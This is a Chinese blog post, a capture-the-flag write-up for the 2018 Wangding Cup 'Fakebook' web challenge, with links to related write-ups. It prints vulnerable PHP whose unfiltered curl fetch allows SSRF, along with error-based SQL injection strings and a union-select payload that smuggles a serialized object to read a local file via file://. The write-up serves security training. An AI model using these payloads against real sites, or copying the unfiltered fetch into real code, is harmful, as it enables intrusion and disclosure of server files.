网鼎杯 Fakebook

最新推荐文章于 2023-06-27 11:04:03 发布
最新推荐文章于 2023-06-27 11:04:03 发布
阅读量195 收藏
点赞数
分类专栏: ctf刷题 文章标签: 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Yjlay/article/details/108478528
版权

原题xctf链接:网鼎杯2018[fakebook]
自己没做出来,看了大佬们的wp打算再综合整理下
扫描得知有robots.txt和flag.Php(我的御剑扫不出来robots.txt,不知道为什么(字典里有但扫不到))
Robots.txt里看到user.php.bak
在这里插入图片描述

下载保存后获得user.php的源码

<?php


class UserInfo
{
    public $name = "";
    public $age = 0;
    public $blog = "";

    public function __construct($name, $age, $blog)
    {
        $this->name = $name;
        $this->age = (int)$age;
        $this->blog = $blog;
    }

    function get($url)
    {
        $ch = curl_init();

        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $output = curl_exec($ch);
        $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        if($httpCode == 404) {
            return 404;
        }
        curl_close($ch);

        return $output;
    }

    public function getBlogContents ()
    {
        return $this->get($this->blog);
    }

    public function isValidBlog ()
    {
        $blog = $this->blog;
        return preg_match("/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]{2,6}(\:[0-9]+)?(\/\S*)?$/i", $blog);
    }

}

发现运用到序列化
随便jion几个用户观察

http://220.249.52.133:45165/view.php?no=1

这样的网址可以进行尝试
N0=-1时 报错,并且看到了网页的绝对路径:/var/www/html/view.php
?no=1 and 1=2 报错,数字型注入
用联合查询或者报错注入试试
使用 union select 显示no hack _
在union和select中再加一个空格就没有提示,但是报错,反序列化错误
使用报错注入,这里使用extractvalue(1,concat(0x7e,(database())))的语句同样显示no hack。采取一段段输入,发现extractvalue(1,concat(报语法错误extractvalue(1,concat(0x7e则显示no hack 将0x7e 替换成‘~’报错注入成功,获得database()

正常报错注入

获得表名:[*] query error! (XPATH syntax error: '~users')
获得列名:[*] query error! (XPATH syntax error: '~no,username,passwd,data')
获得data:[*] query error! (XPATH syntax error: '~O:8:"UserInfo":3:{s:4:"name";s:')

这里被序列化了 使用联合查询
在获得的user.Php下方加上(因为这里显示flag.php里的内容)

$a=new UserInfo("name",1,"file:///var/www/html/flag.php");
echo serialize($a);

得到:O:8:“UserInfo”:3:{s:4:“name”;s:4:“name”;s:3:“age”;i:1;s:4:“blog”;s:29:“file:///var/www/html/flag.php”;}
完整payload:

?no=-1 union  select 1,2,3,'O:8:"UserInfo":3:{s:4:"name";s:4:"name";s:3:"age";i:1;s:4:"blog";s:29:"file:///var/www/html/flag.php";}'

显示正常,右键源代码

单击内容得到flag

<?php $flag = "flag{c1e552fdf77049fabf65168f22f7aeab}"; exit(0);
_小飒
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[网鼎杯 2018]Fakebook1解题思路
xiyuanyue的博客
10-08 311
s:3:"age";s:4:"blog";6、一般flag存储在根目录的flag文件或者flag.php文件修改data 数据O:8:"UserInfo":3:{s:4:"name";s:3:"age";s:4:"blog";
[网鼎杯 2024]Fakebook,网络安全事件分发机制收藏这一篇就够了
最新发布
2401_84185471的博客
04-10 393
注意:序列化内容要在4号位置,这由column的顺序决定。
XCTF-Web-fakebook
weixin_45723896的博客
06-27 40
看到被加密的flag,使用的base64加密:PD9waHANCg0KJGZsYWcgPSAiZmxhZ3tjMWU1NTJmZGY3NzA0OWZhYmY2NTE2OGYyMmY3YWVhYn0iOw0KZXhpdCgwKTsNCg==看文中的提示/var/www/html/view.php,我们也可以去猜测flag.php有可能在统一文件夹下,如/var/www/html/flag.php。/view.php?表名是users,查看表中的信息,执行注入。根据之前的注入可知,有回显的是第二位,也就是。
[网鼎杯 2018]Fakebook记录
Aiwin的博客
07-17 663
[网鼎杯 2018]Fakebook
SSRF漏洞file伪协议之[网鼎杯 2018]Fakebook1
qq_58970968的博客
07-06 1481
关于SSRF漏洞(服务器端伪造)参考SSRF漏洞原理攻击与防御(超详细总结)_零点敲代码的博客-CSDN博客_ssrf漏洞防御SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统)SSRF攻击可能存在任何语言编写的应用,接下来将举例php中可能存在SSRF漏洞的函数。1、file_get_
基于相似度算法的facebook网络数据链路预测1
08-03
在本篇论文中,作者探讨了基于相似度算法的Facebook网络数据链路预测问题,旨在通过分析用户好友数据,预测用户之间的潜在连接。以下是详细的知识点解析: 1. **数据预处理**:在进行分析之前,原始数据需要进行...
facebook_pub_社交网络_
10-04
以Facebook为代表的社交网络,不仅提供了个人与个人之间的连接平台,还构建了一个庞大的数据宝库,为研究者提供了丰富的研究素材。这篇名为"facebook_pub"的文档很可能是关于Facebook社交网络的结构分析。 社交网络...
FaceBook客户端
08-04
Facebook(脸书)是美国的一个社交网络服务网站 ,创立于2004年2月4日,总部位于美国加利福尼亚州门洛帕克,2012年3月6日发布Windows版桌面聊天软件Facebook Messenger [1] 。主要创始人马克·扎克伯格。 Facebook是...
各大公司架构,豆瓣网,facebook,淘宝
02-08
在这个领域,豆瓣网、Facebook和淘宝作为全球知名的互联网公司,它们的架构设计具有重要的参考价值。 【豆瓣网架构】 豆瓣网是中国的一家知名社交媒体和内容分享平台,它的架构设计注重用户互动和内容推荐。豆瓣的...
预测facebook签到位置
08-24
Facebook签到位置预测是一个涉及大数据分析、地理位置服务和社交网络行为学的复杂主题。在这个问题中,我们关注的是如何利用用户在Facebook上分享的签到信息来预测他们可能的未来签到位置。以下是对这个话题的详细...
御剑后台描工具
10-07
功能简介: 1.描线程自定义:用户可根据自身电脑的配置来设置调节描线程 2.集合DIR描 ASP ASPX PHP JSP MDB数据库 包含所有网站脚本路径描 3.默认探测200 (也就是描的网站真实存在的路径文件) 使用方法非常简单只需要在郁闷框输入你要描的域名即可 然后点击
[网鼎杯 2018]Fakebook
Yb_140的博客
09-23 373
拼起来得到完整的:O:8:"UserInfo":3:{s:4:"name";s:4:"blog";可能有过滤,将空格替换为/**/,发现不报错了,但是页面没有回显1,2,3,4。将blog构造为:file:///var/www/html/flag.php。看到这里可能会考反序列化,但是暂时没有发现反序列化入口。得到no,username,passwd,data。这是个反序列化之后的对象,没有显示完全。可以使用file伪协议读取文件。页面源代码没有什么有用信息。
网鼎杯一道web题(fakebook
热门推荐
洞若观火
08-23 1万+
描: nikto描: 发现隐藏的robots.txt,其中有源码泄漏(/user.php.bak),输入到地址栏,得到文件user.php.bak。然后用御剑描,发现flag.php。 user.php.bak源码: &lt;?php class UserInfo {     public $name = "";     public $age = 0;     public $...
后台描与备份文件泄露(御剑+dirsearch使用)
qq_35599248的博客
08-05 9279
1、后台描 当我们通过f12和抓包后还可通过御剑后台描工具或者dirsearch等工具进行路径描查看是否存在一些敏感文件,如后台管理页面或备份文件等,还可以看看robots.txt文件。 2、御剑 2.1、特点 1.描线程自定义:用户可根据自身电脑的配置来设置调节描线程 2.集合DIR描 ASP ASPX PHP JSP MDB数据库 包含所有网站脚本路径描 3.默认探测200 (也就是描的网站真实存在的路径文件) 御剑操作比较简单,直接输入网址,然后设置线程和扩展名类型,还可探测不同状态
CTF[网鼎杯]Fakebook
她叫常玉莹
08-25 622
robots中发现 user.php.bak文件 下载文件 <?php class UserInfo { public $name = ""; public $age = 0; public $blog = ""; public function __construct($name, $age, $blog) { $this->name = $name; $this->age = (int)$age;
攻防世界XCTF:fakebook
末初的CSDN博客
03-14 6200
再注册账号时,发现了个post注入 目录描一下,存在robots.txt和flag.php 源码: Get()方法并没有对获取过来的url进行任何的过滤所以这里存在SSRF 这里存在一个get注入 从报错中可以看出网站绝对路径/var/www/html 使用updatexml报错注入查询信息 这里concat()注入还是有很多不方便,使用make_set()进行注入 综合...
[网鼎杯 2018]Fakebook 解题思路&过程
iamblackcat's blog
09-12 1728
[网鼎杯 2018]Fakebook 解题思路&过程
2020.4.8 xctf(fakebook)
DSR446的博客
04-10 652
提示让我们注册一个账号,这里随便注册,注意一下blog的格式就行。 然后用我们注册好的账号进行登录。 登录后发现url 为 http://111.198.29.45:33988/view.php?no=1 ,第一时间想到是否存在sql注入,我们输入 ’ 根据报错的显示,可以肯定存在sql注入的,然后我们用 order by 语句判断查询的字段数目,以便于后续进行 union 查询, 先 ...
Facebook架构:以数据驱动的社会关系平台
Facebook的架构设计是一个围绕核心数据驱动的创新案例,它展示了如何在社交网络领域构建强大且适应性强的系统。本文着重于讲述Facebook平台的数据增长与其在设计上的关键要素,强调了数据在系统中的中心地位。 6.1...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值